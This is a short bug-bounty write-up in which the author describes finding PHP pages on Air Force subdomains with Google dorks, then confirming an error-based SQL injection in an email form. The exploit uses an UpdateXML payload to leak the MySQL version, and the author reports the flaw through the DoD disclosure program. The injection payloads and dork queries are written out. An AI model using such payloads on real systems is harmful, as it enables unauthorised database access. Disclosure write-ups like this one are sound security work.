Information is key. What sort of information could be in an Air Force Database?
Who would get hurt by that data? Who would it benefit?
In 2017, 17-year-old me easily gained access to an Air Force database.
Back then, I practiced in the DoD's Vulnerability Disclosure Program (VDP). I was looking at the Airforce subdomains and I decided to look for sites running PHP.
To do this, I used Google. If you use Google, you should know about Google Dorks. (If you don't, look them up!)
I looked up: site:*.af.mil + ext:php
and site:.af.mil + filetype:php
.
I got a ton of results and I visited one:
https://███.af.mil/php/███/███.php
It was a form that asked for an email. So, I entered an email and submitted the form:
https://███.af.mil/php/███/███[email protected]
I decided to try SQL Injection. The application is likely saving my email to a database.
So, I tried the following: https://███.af.mil/php/███/███.php?email='
The application responded with an error message that the email address was invalid.
So, I tried the following: https://███.af.mil/php/███/███.php?email='@hackerone.mil
This time I got an SQL error!
You have an error in your SQL syntax
Sweet! It's MySQL! This application showed database error messages. Knowing this, I wanted to gain info through triggering error messages. Through MySQL's XML Functions.
The UpdateXML()
function replaces an XML fragment and returns it.
UpdateXML('xml', 'xpath_expression', 'new replacement')
If the function is given an invalid XPath expression, it throws an error.
So, I came up with the following:
https://███.af.mil/php/███/███.php?email=' and updatexml(null,concat(0x0a,version()),null)-- [email protected]
XPATH syntax error: ':5.6.24-log'
I stopped here and I reported it to the Department of Defense's vulnerability disclosure program on HackerOne.
You can see the redacted report here: https://hackerone.com/reports/277380